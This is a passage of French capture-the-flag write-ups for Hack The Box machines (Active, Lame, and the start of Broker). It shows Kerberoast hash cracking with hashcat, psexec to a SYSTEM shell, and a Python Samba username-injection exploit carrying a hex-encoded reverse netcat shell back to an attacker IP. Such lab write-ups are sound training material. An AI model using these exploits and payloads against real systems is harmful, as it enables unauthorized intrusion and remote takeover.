0d53b7655a4b8ec5ee1e54b408f7416197e66ea5650b317deb4b50dda2d1164ce4e51d802e099dbed074edb67b9fa2cf90ae3535fbfad2be12fe224132132040e1e842355ad2783c07c376e2f97017cc84d266bb8127681edfdaae6fa0de25a3092fecb65860d22279a50db9c0f339f5ea4b21fa96007757b9099aca27c87e34403149179c77dcbe5e546db3960f768a2cccbff8fdb869b61c312357186bc803e56b76a503d9716549e53ada50aeb8eaf0018bed0449a63d4a69fb985eacb782f48e5f6c18603ce64ad7f5acc2046798a13de5c8da29e9ec5b763c63d19fdb9fc9d41fd6f704098ff0fda0220ea2ba32ada95eba169827ef9ad50c77475ef5dc45cc56063c28462a1a81786271ed6ae8505d3aca6b81aa9c1e9964a3dec3277a526a239241251a3c05bcbab5b30e596e23c189bcc442170b3b09a3e9f8b2e5d00cae47 Ce résultat correspond au hash TGS récupéré pour le compte Administrator.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 » vim admin_hash.txt » hashcat -m 13100 -a 0 admin_hash.txt ~/wordlists/rockyou.txt hashcat (v6.2.5) starting Dictionary cache hit: * Filename..: /home/leopold/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139922195 * Keyspace..: 14344385 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8852493078c2a4f352f6468b34dcd243$38b8aa13f6ffb46cd7866c10ab7d0dc3a54117cfe4cd271fba599fa52f84b826cb94edda0fada6c386721fa3edfc10cf58b23c35cfdbd409e42d9ba81b84cab539fb285d561f7a8c15f3ee813eede43d56618635868377a8b9fe39c0708da79aebe14351a3bcf89b1d6f248a545a042772b27bd528c91df09e5b900df3b5188cd734316acd1416c63bf032540166f0e319db943dc7a099234da10956156f753927dafbb8f1c244df2b4a3c349f333a1cb6d26ae607a037b9a39a0f995f8ba811d7b8dfc58100c6b88b8493c1d85dee40d784f275c24184e727c3e55baa2fa233a28a820e5d04684b320b925588f9eb37568891bef410775ec5c001c0dbbe9b8b1acce9b7b55aa54b37367fabede080a6a270e5a79b49ff27f83f90da85a6bbe4a99210d6fb4a9d01faee68080243f6bc04131beb8111fceeedc87bbdd9168d95d3e15e262ed2a7a0bbda46c0a51bdbb32fc98bd81252f31f928e317b06a768ed51e75e58dc66b430f9638d2996944b324ea624be7fc9a24ff5b2cd4ab9ae0b156fc9747c8c7482b785815c46293b772f1d920c776b2a6aa2ab1bf815543ba5070381cd55f21b4c9b9a70172c3e637dad6e91c1e03651de9f8532e537119b2062f63c92a771ba8fe33b3ca7a674a204331d3f577bff722492b960c241a84c59f63b28b7eeba74c37db41f4d91215e3421d820b39b4a1dfd9477b885385c8bf578718ef8f8ca659818795dd182bc91f7e13afae7cf4e38cf9bb5f4e6530ec9ae3272873e706dd528e52bbedfd39de18621c71eed9556eaec0d53b7655a4b8ec5ee1e54b408f7416197e66ea5650b317deb4b50dda2d1164ce4e51d802e099dbed074edb67b9fa2cf90ae3535fbfad2be12fe224132132040e1e842355ad2783c07c376e2f97017cc84d266bb8127681edfdaae6fa0de25a3092fecb65860d22279a50db9c0f339f5ea4b21fa96007757b9099aca27c87e34403149179c77dcbe5e546db3960f768a2cccbff8fdb869b61c312357186bc803e56b76a503d9716549e53ada50aeb8eaf0018bed0449a63d4a69fb985eacb782f48e5f6c18603ce64ad7f5acc2046798a13de5c8da29e9ec5b763c63d19fdb9fc9d41fd6f704098ff0fda0220ea2ba32ada95eba169827ef9ad50c77475ef5dc45cc56063c28462a1a81786271ed6ae8505d3aca6b81aa9c1e9964a3dec3277a526a239241251a3c05bcbab5b30e596e23c189bcc442170b3b09a3e9f8b2e5d00cae47:Ticketmaster1968 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...0cae47 Time.Started.....: Sun Jan 5 01:39:10 2025 (1 sec) Time.Estimated...: Sun Jan 5 01:39:11 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/home/leopold/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 7678.4 kH/s (9.15ms) @ Accel:1024 Loops:1 Thr:32 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 10616832/14344385 (74.01%) Rejected.........: 0/10616832 (0.00%) Restore.Point....: 10321920/14344385 (71.96%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: ahki_22 -\u0026gt; Saboka54 Hardware.Mon.#1..: Temp: 36c Fan: 46% Util: 23% Core:1860MHz Mem:3802MHz Bus:16 Started: Sun Jan 5 01:39:09 2025 Stopped: Sun Jan 5 01:39:12 2025 On trouve le mot de passe de l\u0026rsquo;administrateur ! Administrator:Ticketmaster1968\nOn peut maintenant se connecter en SMB et accéder au dossier de l\u0026rsquo;adminstrateur dans le share \u0026ldquo;USERS\u0026rdquo; qui était bloqué auparavant. On obtient bien le flag root.txt.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 $ smbclient //10.10.10.100/Users -U \u0026#39;Administrator%Ticketmaster1968\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; cd Administrator\\ smb: \\Administrator\\\u0026gt; ls . D 0 Mon Jul 16 06:14:21 2018 .. D 0 Mon Jul 16 06:14:21 2018 AppData DHn 0 Sat Jan 4 07:29:39 2025 Application Data DHSrn 0 Mon Jul 16 06:14:15 2018 Contacts DR 0 Mon Jul 30 09:50:10 2018 Cookies DHSrn 0 Mon Jul 16 06:14:15 2018 Desktop DR 0 Thu Jan 21 11:49:47 2021 Documents DR 0 Mon Jul 30 09:50:10 2018 Downloads DR 0 Thu Jan 21 11:52:32 2021 Favorites DR 0 Mon Jul 30 09:50:10 2018 Links DR 0 Mon Jul 30 09:50:10 2018 Local Settings DHSrn 0 Mon Jul 16 06:14:15 2018 Music DR 0 Mon Jul 30 09:50:10 2018 My Documents DHSrn 0 Mon Jul 16 06:14:15 2018 NetHood DHSrn 0 Mon Jul 16 06:14:15 2018 NTUSER.DAT AHSn 524288 Sat Jan 4 07:30:15 2025 ntuser.dat.LOG1 AHS 262144 Sat Jan 4 08:05:30 2025 ntuser.dat.LOG2 AHS 0 Mon Jul 16 06:14:09 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 06:14:15 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018 ntuser.ini HS 20 Mon Jul 16 06:14:15 2018 Pictures DR 0 Mon Jul 30 09:50:10 2018 PrintHood DHSrn 0 Mon Jul 16 06:14:15 2018 Recent DHSrn 0 Mon Jul 16 06:14:15 2018 Saved Games DR 0 Mon Jul 30 09:50:10 2018 Searches DR 0 Mon Jul 30 09:50:10 2018 SendTo DHSrn 0 Mon Jul 16 06:14:15 2018 Start Menu DHSrn 0 Mon Jul 16 06:14:15 2018 Templates DHSrn 0 Mon Jul 16 06:14:15 2018 Videos DR 0 Mon Jul 30 09:50:10 2018 5217023 blocks of size 4096. 277230 blocks available smb: \\Administrator\\\u0026gt; cd Desktop smb: \\Administrator\\Desktop\\\u0026gt; cat root.txt cat: command not found smb: \\Administrator\\Desktop\\\u0026gt; get root.txt getting file \\Administrator\\Desktop\\root.txt of size 34 as root.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec) smb: \\Administrator\\Desktop\\\u0026gt; ┌──(kali㉿kali)-[~/htb/Active/bloodhound2] └─$ cat root.txt 5d2a.....fb20 Administrator shell Grâce à l\u0026rsquo;outil psexec.py de la suite Impacket, j\u0026rsquo;ai pu obtenir un shell interactif avec les privilèges les plus élevés (NT AUTHORITY\\SYSTEM) sur la machine cible. Cela a été possible en utilisant les identifiants de l\u0026rsquo;utilisateur Administrator pour se connecter au partage SMB ADMIN$, uploader un exécutable temporaire, et créer un service Windows pour l\u0026rsquo;exécuter. Une fois le service démarré, un accès complet au système a été établi, permettant un contrôle total de la machine.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ impacket-psexec Administrator:\u0026#34;Ticketmaster1968\u0026#34;@10.10.10.100 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.10.100..... [*] Found writable share ADMIN$ [*] Uploading file lwoxkZvR.exe [*] Opening SVCManager on 10.10.10.100..... [*] Creating service zfLo on 10.10.10.100..... [*] Starting service zfLo..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\Windows\\system32\u0026gt; whoami nt authority\\system ","date":"2025-01-05T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/active-htb/","title":"HTB | Active"},{"content":" Machine name OS IP Difficulty Lame Linux 10.10.10.3 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 $ nmap -vvv -sC -sV -An -p- 10.10.10.3 -Pn PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.11 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg== | 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew== 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3632/tcp open distccd syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_ms-sql-info: ERROR: Script execution failed (use -d to debug) | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 59488/tcp): CLEAN (Timeout) | Check 2 (port 46758/tcp): CLEAN (Timeout) | Check 3 (port 14597/udp): CLEAN (Timeout) | Check 4 (port 40169/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) |_smb-security-mode: ERROR: Script execution failed (use -d to debug) |_smb2-security-mode: Couldn\u0026#39;t establish a SMBv2 connection. |_smb2-time: Protocol negotiation failed (SMB2) enum4linux 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 $ enum4linux 10.10.10.3 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec 17 17:01:25 2024 =========================================( Target Information )========================================= Target ........... 10.10.10.3 RID Range ........ 500-550,1000-1050 Username ......... \u0026#39;\u0026#39; Password ......... \u0026#39;\u0026#39; Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =============================( Enumerating Workgroup/Domain on 10.10.10.3 )============================= [E] Can\u0026#39;t find workgroup/domain =================================( Nbtstat Information for 10.10.10.3 )================================= Looking up status of 10.10.10.3 No reply from 10.10.10.3 ====================================( Session Check on 10.10.10.3 )==================================== [+] Server 10.10.10.3 allows sessions using username \u0026#39;\u0026#39;, password \u0026#39;\u0026#39; =================================( Getting domain SID for 10.10.10.3 )================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can\u0026#39;t determine if host is part of domain or part of a workgroup ====================================( OS information on 10.10.10.3 )==================================== [E] Can\u0026#39;t get OS info with smbclient [+] Got OS info for 10.10.10.3 from srvinfo: LAME Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian) platform_id : 500 os version : 4.9 server type : 0x9a03 ========================================( Users on 10.10.10.3 )======================================== index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null) index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null) index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null) index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null) index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null) index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null) index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null) index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null) index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null) index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null) index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null) index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null) index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null) index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null) index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null) index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null) index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null) index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null) index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null) index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null) index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null) index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null) index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null) index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null) index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null) index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null) index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null) index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null) index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null) index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null) index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null) index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null) index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null) index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null) index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null) user:[games] rid:[0x3f2] user:[nobody] rid:[0x1f5] user:[bind] rid:[0x4ba] user:[proxy] rid:[0x402] user:[syslog] rid:[0x4b4] user:[user] rid:[0xbba] user:[www-data] rid:[0x42a] user:[root] rid:[0x3e8] user:[news] rid:[0x3fa] user:[postgres] rid:[0x4c0] user:[bin] rid:[0x3ec] user:[mail] rid:[0x3f8] user:[distccd] rid:[0x4c6] user:[proftpd] rid:[0x4ca] user:[dhcp] rid:[0x4b2] user:[daemon] rid:[0x3ea] user:[sshd] rid:[0x4b8] user:[man] rid:[0x3f4] user:[lp] rid:[0x3f6] user:[mysql] rid:[0x4c2] user:[gnats] rid:[0x43a] user:[libuuid] rid:[0x4b0] user:[backup] rid:[0x42c] user:[msfadmin] rid:[0xbb8] user:[telnetd] rid:[0x4c8] user:[sys] rid:[0x3ee] user:[klog] rid:[0x4b6] user:[postfix] rid:[0x4bc] user:[service] rid:[0xbbc] user:[list] rid:[0x434] user:[irc] rid:[0x436] user:[ftp] rid:[0x4be] user:[tomcat55] rid:[0x4c4] user:[sync] rid:[0x3f0] user:[uucp] rid:[0x3fc] ==================================( Share Enumeration on 10.10.10.3 )================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAME [+] Attempting to map shares on 10.10.10.3 //10.10.10.3/print$ Mapping: DENIED Listing: N/A Writing: N/A //10.10.10.3/tmp Mapping: OK Listing: OK Writing: N/A //10.10.10.3/opt Mapping: DENIED Listing: N/A Writing: N/A [E] Can\u0026#39;t understand response: NT_STATUS_NETWORK_ACCESS_DENIED listing \\* //10.10.10.3/IPC$ Mapping: N/A Listing: N/A Writing: N/A //10.10.10.3/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A =============================( Password Policy Information for 10.10.10.3 )============================= [+] Attaching to 10.10.10.3 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] LAME [+] Builtin [+] Password Info for Domain: LAME [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 0 ========================================( Groups on 10.10.10.3 )======================================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ===================( Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050) )=================== [I] Found new SID: S-1-5-21-2446995257-2525374255-2673161615 [+] Enumerating users using SID S-1-5-21-2446995257-2525374255-2673161615 and logon username \u0026#39;\u0026#39;, password \u0026#39;\u0026#39; S-1-5-21-2446995257-2525374255-2673161615-500 LAME\\Administrator (Local User) S-1-5-21-2446995257-2525374255-2673161615-501 LAME\\nobody (Local User) S-1-5-21-2446995257-2525374255-2673161615-512 LAME\\Domain Admins (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-513 LAME\\Domain Users (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-514 LAME\\Domain Guests (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1000 LAME\\root (Local User) S-1-5-21-2446995257-2525374255-2673161615-1001 LAME\\root (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1002 LAME\\daemon (Local User) S-1-5-21-2446995257-2525374255-2673161615-1003 LAME\\daemon (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1004 LAME\\bin (Local User) S-1-5-21-2446995257-2525374255-2673161615-1005 LAME\\bin (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1006 LAME\\sys (Local User) S-1-5-21-2446995257-2525374255-2673161615-1007 LAME\\sys (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1008 LAME\\sync (Local User) S-1-5-21-2446995257-2525374255-2673161615-1009 LAME\\adm (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1010 LAME\\games (Local User) S-1-5-21-2446995257-2525374255-2673161615-1011 LAME\\tty (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1012 LAME\\man (Local User) S-1-5-21-2446995257-2525374255-2673161615-1013 LAME\\disk (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1014 LAME\\lp (Local User) S-1-5-21-2446995257-2525374255-2673161615-1015 LAME\\lp (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1016 LAME\\mail (Local User) S-1-5-21-2446995257-2525374255-2673161615-1017 LAME\\mail (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1018 LAME\\news (Local User) S-1-5-21-2446995257-2525374255-2673161615-1019 LAME\\news (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1020 LAME\\uucp (Local User) S-1-5-21-2446995257-2525374255-2673161615-1021 LAME\\uucp (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1025 LAME\\man (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1026 LAME\\proxy (Local User) S-1-5-21-2446995257-2525374255-2673161615-1027 LAME\\proxy (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1031 LAME\\kmem (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1041 LAME\\dialout (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1043 LAME\\fax (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1045 LAME\\voice (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1049 LAME\\cdrom (Domain Group) ================================( Getting printer info for 10.10.10.3 )================================ No printers returned. enum4linux complete on Tue Dec 17 17:02:53 2024 Exploitation Samba smbd 3.0.20-Debian 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 $ cat exploit.py #!/usr/bin/python3 #exploit Samba smbd 3.0.20-Debian from smb import * from smb.SMBConnection import * # msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.16.11 LPORT=1337 -f python buf = b\u0026#34;\u0026#34; buf += b\u0026#34;\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\u0026#34; buf += b\u0026#34;\\x6d\\x69\\x66\\x75\\x63\\x3b\\x20\\x6e\\x63\\x20\\x31\\x30\u0026#34; buf += b\u0026#34;\\x2e\\x31\\x30\\x2e\\x31\\x36\\x2e\\x31\\x31\\x20\\x31\\x33\u0026#34; buf += b\u0026#34;\\x33\\x37\\x20\\x30\\x3c\\x2f\\x74\\x6d\\x70\\x2f\\x6d\\x69\u0026#34; buf += b\u0026#34;\\x66\\x75\\x63\\x20\\x7c\\x20\\x2f\\x62\\x69\\x6e\\x2f\\x73\u0026#34; buf += b\u0026#34;\\x68\\x20\\x3e\\x2f\\x74\\x6d\\x70\\x2f\\x6d\\x69\\x66\\x75\u0026#34; buf += b\u0026#34;\\x63\\x20\\x32\\x3e\\x26\\x31\\x3b\\x20\\x72\\x6d\\x20\\x2f\u0026#34; buf += b\u0026#34;\\x74\\x6d\\x70\\x2f\\x6d\\x69\\x66\\x75\\x63\u0026#34; userID = \u0026#34;/=` nohup \u0026#34; + buf.decode(\u0026#39;utf-8\u0026#39;) + \u0026#34;`\u0026#34; password = \u0026#39;password\u0026#39; victim_ip = \u0026#39;10.10.10.3\u0026#39; conn = SMBConnection(userID, password, \u0026#34;HELLO\u0026#34;, \u0026#34;TEST\u0026#34;, use_ntlm_v2=False) conn.connect(victim_ip, 445) ------------------------------------------ $ python3 exploit.py ------------------------------------------ $ nc -lnvp 1337 Listening on 0.0.0.0 1337 Connection received on 10.10.10.3 48005 whoami root cat /root/root.txt 03ce.....b6ed user flag - makis 1 2 3 4 5 6 root@lame:/home# cd /home/makis/ root@lame:/home/makis# ls user.txt root@lame:/home/makis# cat user.txt d336.....2192 root@lame:/home/makis# ","date":"2024-12-17T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/lame-htb/","title":"HTB | Lame"},{"content":" Machine name OS IP Difficulty Broker Linux 10.10.11.243 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 nmap -sC -sV -An -p- 10.10.11.243 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) | http-auth: | HTTP/1.1 401 Unauthorized\\x0D |_ basic realm=ActiveMQRealm |_http-title: Error 401 Unauthorized 1883/tcp open mqtt | mqtt-subscribe: | Topics and their most recent payloads: | ActiveMQ/Advisory/Consumer/Topic/#: |_ ActiveMQ/Advisory/MasterBroker: 5672/tcp open amqp? |_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65 | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: | AMQP | AMQP | amqp:decode-error |_ 7Connection from client using unsupported AMQP attempted 8161/tcp open http Jetty 9.4.39.v20210325 |_http-title: Error 401 Unauthorized |_http-server-header: Jetty(9.4.39.v20210325) | http-auth: | HTTP/1.1 401 Unauthorized\\x0D |_ basic realm=ActiveMQRealm 44151/tcp open tcpwrapped 61613/tcp open stomp Apache ActiveMQ | fingerprint-strings: | HELP4STOMP: | ERROR | content-type:text/plain | message:Unknown STOMP action: HELP | org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP | org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258) | org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85) | org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83) | org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233) | org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215) |_ java.lang.Thread.run(Thread.java:750) 61614/tcp open http Jetty 9.4.39.v20210325 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn\u0026#39;t have a title. |_http-server-header: Jetty(9.4.39.v20210325) 61616/tcp open apachemq ActiveMQ 